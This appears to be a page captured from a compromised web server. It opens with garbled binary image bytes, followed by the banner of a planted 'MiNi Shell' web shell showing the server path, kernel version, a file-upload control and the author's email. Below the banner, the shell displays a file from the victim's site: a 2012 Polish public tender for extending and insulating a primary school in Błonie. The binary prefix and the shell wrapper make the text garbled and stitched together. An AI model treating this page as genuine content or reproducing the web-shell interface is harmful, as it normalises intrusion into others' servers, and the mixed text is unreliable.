JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120914/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120914/198745-N-2012.html

<p class="kh_header"><b>Błonie: Rozbudowa budynku Szkoły Podstawowej Nr 2 im. Janusza Korczaka w Błoniu przy 
  ul. Narutowicza 21, wraz z termomodernizacją budynku.</b><br>
<b>Numer ogłoszenia: 198745 - 2012; data zamieszczenia: 14.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Błonie , Rynek 6, 05-870 Błonie, woj. mazowieckie, tel. 022 7253004, 7253006, faks 022 7253067.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa budynku Szkoły Podstawowej Nr 2 im. Janusza Korczaka w Błoniu przy 
  ul. Narutowicza 21, wraz z termomodernizacją budynku..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia
      Rozbudowa budynku szkoły
  Budynek usytuowany jest na działce nr ew.38 w obrębie 0015 w Błoniu przy ul.Narutowicza 21.
  Celem rozbudowy jest uzyskanie dodatkowych pomieszczeń przeznaczonych do nauki dzieci,
  nowych pomieszczeń gospodarczych i windy dla osób niepełnosprawnych.
  Dobudowana część składa się z z czterech kondygnacji, wykonana w konstrukcji mieszanej: 
  murowanej i słupowo płytowej. Dach płaski wentylowany, ściany zewnętrzne wykonane z  
  pustaków typu MAX. W części podziemnej ściany wykonane z bloczków betonowych.
  Stropy żelbetowe monolityczne wylewane na budowie, fundamenty w postaci żelbetowej płyty  
  dennej. Posadowienie nowej części powyżej istniejących fundamentów. Rozbudowa 
  zdylatowana od istniejącego budynku. 
  Rozbudowana część wyposażona jest: 
  - w instalację zimnej i ciepłej wody, zasilanie z istniejącej instalacji budynku szkoły,
  - w instalację kanalizacji sanitarnej podłączonej do istniejącej instalacji w budynku szkoły,
  - w instalację centralnego ogrzewania wodną z grzejnikami konwekcyjnymi, ciepło z 
    istniejącego węzła w budynku szkoły, 
  - w instalację wentylacji grawitacyjnej, wywiewna częściowo wspomagana mechanicznie,
  - w instalację elektryczną, zasilanie z istniejącego budynku szkoły. 
  Dobudowana winda (platforma) dla osób niepełnosprawnych zaprojektowana w szybie   
  samonośnym, konstrukcja odporna na warunki atmosferyczne, wykonana z profili   
  aluminiowych wypełnionych płytami warstwowymi, hydrauliczna o minimalnych wymiarach 
  kabiny 110 x 140 cm.  
  

  Kubatura łączna               -  1.603,0 m3 
  Powierzchnia użytkowa  rozbudowy -  344,3 m2
  Powierzchnia zabudowy                    -  106,2 m2
  Powierzchnia  całkowita budynku     -  427,2 m2

Termomodernizacja budynku szkoły
Termomodernizacji podlega cały budynek szkoły i jego wszystkie części. 
Prace przy termomodernizacji polegać będą na wykonaniu następującego zakresu robót:
1. docieplenie stropodachu,
2. wymiana stolarki drzwiowej,
3. docieplenie ścian zewnętrznych wraz z wykończeniem i malowaniem,
4. roboty towarzyszące wynikające z prowadzenia robót termomodernizacyjnych, 
5. roboty ślusarsko-kowalskie,
6. roboty dekarskie

1. Zakres przedmiotu zamówienia obejmuje min.: 
1.1. rozbudowę szkoły wg dokumentacji projektowej i pozwolenia na budowę,
1.2. budowę platformy dźwigowej dla osób niepełnosprawnych,
1.3. wymianę instalacji c.o. w  istniejącej części budynku szkoły,
1.4. termomodernizację obiektu,
1.5. wykucie otworu i wstawienie nowych drzwi ewakuacyjnych p.poż. od strony wschodniej    
       budynku szkoły - wejście z sali gimnastycznej,
1.6. wykonanie chodników i opaski wokół budynku.
1.7. zagospodarowanie i uporządkowanie terenu
Szczegółowy opis przedmiotu zamówienia i zakres robót do wykonania zawarty jest 
w dokumentach, które stanowią załączniki do niniejszej specyfikacji:
- projekt budowlany: 
  branża architektoniczna, konstrukcyjna, instalacje sanitarne, instalacje elektryczne,  
- projekt wykonawczy:
  branża architektoniczna, branża konstrukcyjna, branża elektryczna, instalacje sanitarne:    
  wod.-kan., centralnego ogrzewania,
- specyfikacja techniczna wykonania i odbioru robót:
  branża architektoniczno-konstrukcyjna, branża elektryczna,
- specyfikacja techniczna 
  instalacja centralnego ogrzewania, instalacja wod-kan.
- specyfikacja techniczna wykonania i odbioru robót budowlanych,
- projekt architektoniczno-budowlany - termomodernizacja,
- audyt energetyczny budynku szkoły,
Decyzje:
- pozwolenie na budowę nr 971/10 Starosty Warszawskiego Zachodniego z dnia 08.07.2010r.
  na wykonanie robót budowlanych termomodernizacji budynku Szkoły Podstawowej nr 2 
  w Błoniu przy ul. Narutowicza, z klauzulą ostateczności z dnia 23.07.2010r.,
- pozwolenie na budowę nr 1965/2011 Starosty Warszawskiego Zachodniego z dnia 14.12.2011r. 
  na rozbudowę budynku Szkoły Podstawowej nr 2 w Błoniu przy ul. Narutowicza, z klauzulą 
  ostateczności z dnia 04.01.2012r.
- milcząca zgoda nr 261/12 z dnia 14.05.2012r. do zgłoszenia robót niewymagających   
  pozwolenia na budowę z dnia 17.04.2012r. na wymianę instalacji centralnego ogrzewania w 
  budynku Szkoły Podstawowej nr 2 w Błoniu przy ul. Narutowicza. 

Przedmiary robót w poszczególnych branżach, są dokumentami pomocniczymi ( z uwagi na   wynagrodzenie ryczałtowe nie mają mocy obowiązującej)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówienia uzupełniającego polegającego na 
   powtórzeniu prac będących przedmiotem zamówienia lub jego części, o którym jest mowa   
   w art. 67 ust. 1 pkt 6 ustawy Prawo zamówień publicznych.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.26.00.00-7, 45.31.00.00-3, 45.30.00.00-0, 45.33.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każda składana oferta musi być zabezpieczona wadium w wysokości 45.000 PLN     
  (słownie: czterdzieści pięć tysięcy złotych).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykaz wykonanych robót 
      w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres  
      prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości,      
      daty i miejsca wykonania oraz załączenie dokumentu (referencje) potwierdzającego, że 
      wykazane roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo 
      ukończone, tj.
    - minimum 2 budów o podobnym zakresie - rozbudowa lub budowa obiektów użyteczności 
      publicznej ( nie uwzględniamy hal, magazynów, dużych powierzchni sklepowych), 
    - 2 zadania z zakresu termomodernizacji, 2 zadania z zakresu wymiany instalacji c.o. w 
      obiektach o zbliżonej kubaturze 15.000 m3;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykaz osób  
       które będą uczestniczyć w wykonywaniu zamówienia, odpowiedzialnych za kierowanie 
       robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, 
      doświadczenia i wykształcenia niezbędnego do wykonania zamówienia, a także zakresu 
      wykonywanych przez nich czynności oraz informacją o podstawie do dysponowania tymi 
      osobami, tj.: 
    - co najmniej jedna osoba, która będzie na stanowisku kierownika budowy mająca 
      uprawnienia budowlane w specjalności konstrukcyjno-budowlanej do pełnienia 
      samodzielnych funkcji technicznych w budownictwie i kierowania robotami w zakresie 
      odpowiadającym przedmiotowi zamówienia wymagane przepisami ustawy z dnia 
      7 lipca 1994r. Prawo budowlane, posiadająca aktualną przynależność do Izby Inżynierów 
      Budownictwa,  
    - kierownicy robót w branżach: sanitarnej, elektrycznej posiadający uprawnienia w danej 
       specjalności oraz aktualną przynależność do Izby Inżynierów Budownictwa, 
    - oświadczenie Wykonawcy, że wykazane osoby, które będą uczestniczyć w wykonaniu 
      zamówienia, posiadają wymagane uprawnienia,</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. dowód wniesienia wadium
2. druk oferty wypełniony i podpisany przez osoby uprawnione,
3. uproszczony kosztorys ofertowy
4. harmonogram rzeczowo finansowy
5. oświadczenie o spełnianiu warunków określonych przepisami art. 44 ustawy Pzp
6. podpisany wzór umowy
7. oświadczenie Wykonawcy, że posiada ubezpieczenie od odpowiedzialności cywilnej w 
       zakresie prowadzonej działalności związanej z przedmiotem zamówienia, a w przypadku 
       wyboru jego oferty przedstawi w dniu podpisania umowy, opłaconą polisę o wartości co 
       najmniej 1.000.000,00 zł na cały okres realizacji umowy. 
8. oświadczenie Wykonawcy o podstawie dysponowania narzędziami i urządzeniami 
       technicznymi w celu realizacji zamówienia, wg specyfikacji technicznych wykonania i 
       odbioru robót, 
9. oświadczenie o dysponowaniu niezbędną ilością osób gwarantujących wykonanie 
      zamówienia w wyznaczonym terminie.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. zmiana zakresu robót:
    a). wstrzymania przez Zamawiającego wykonania robót nie wynikających z okoliczności     
         leżących po stronie Wykonawcy, 
    b). rezygnacja przez Zamawiającego z realizacji części przedmiotu zamówienia. W takim 
         przypadku wynagrodzenie przysługujące Wykonawcy zostanie pomniejszone, przy czym 
         Zamawiający zapłaci za wszystkie spełnione świadczenia oraz udokumentowane koszty, 
         które poniósł Wykonawca w związku z wynikającymi z umowy planowanymi 
         świadczeniami.           
 2. zmiana terminu realizacji: 
    a). zmiana terminu realizacji umowy jeżeli uzasadnione to będzie okolicznościami leżącymi 
         po stronie Zamawiającego, w szczególności sytuacją finansową, zdolnościami płatniczymi 
         lub warunkami organizacyjnymi,
    b). z powodu niekorzystnej aury wydłużającej termin budowy, 
 3. w innych przypadkach:
     a). których nie można było przewidzieć w chwili zawarcia umowy, a które nie mają wpływu 
          na wybór Wykonawcy w przeprowadzonym przetargu,
     b). nastąpi ustawowa zmiana obowiązującej stawki podatku VAT, w takim przypadku 
          wysokość wynagrodzenia należnego Wykonawcy ustalona będzie każdorazowo na dzień
          wystawienia faktury (powstania obowiązku podatkowego),</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.blonie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Błoniu, ul. Rynek 6, 05-870 Błonie
Wydział Zamówień Publicznych  pok. nr 3.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.10.2012 godzina 12:00, miejsce: Urząd Miejski w Błoniu ul. Rynek 6, 05-870 Błonie 
Biuro Obsługi Interesanta, Ratusz (pok. nr 1, parter).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Program system zielonych inwestycji - zarządzanie energią w budynkach użyteczności publicznej -
Program Narodowego Funduszu Ochrony Środowiska i Gospodarki Wodnej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com